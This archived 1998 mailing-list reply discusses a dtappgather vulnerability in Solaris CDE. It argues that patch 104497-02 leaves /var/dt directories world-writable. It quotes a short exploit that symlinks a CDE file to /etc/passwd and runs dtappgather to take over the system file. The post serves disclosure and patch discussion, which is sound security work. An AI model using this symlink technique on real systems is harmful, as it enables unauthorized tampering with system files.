Re: /usr/dt/bin/dtappgather exploit

From: J.A. Gutierrez (spdat_private)
Date: Wed Feb 25 1998 - 11:26:02 PST

Next message: William T Wilson: "Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary"

Previous message: Brian Macke: "Re: FreeBSD getpass "feature""
Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>
> patches  104497    CDE 1.0.1: dtappgather patch

        I'm afraid that's not enough: it fixes the DTUSERSESSION
        bug; but it doesn't fixes directory permisions.

        In a Solaris 2.5 sparc box, with patch 104497-02
        you have:

drwxrwxrwx   4 root     root        1536 Feb 25 19:46 /var/dt
drwxrwxrwx   3 bin      bin          512 Jan 20  1997 /var/dt/appconfig
drwxr-xr-x   4 elias    robot        512 Oct  6 14:42 /var/dt/tmp
               ^^^^^ this is a normal non-admin account; sometimes
                           the CDE login sessions changes it.

        so, it's still vulnerable to the link exploit

        (but yes, this is not a problem in 2.6, I don't know about 2.5.1)


> > > nigg0r@host% ls -l /etc/passwd
> > > -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
> > > nigg0r@host% ln -s /etc/passwd
> /var/dt/appconfig/appmanager/generic-display-0
> > > nigg0r@host% dtappgather


--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

Next message: William T Wilson: "Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary"
Previous message: Brian Macke: "Re: FreeBSD getpass "feature""
Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:18 PDT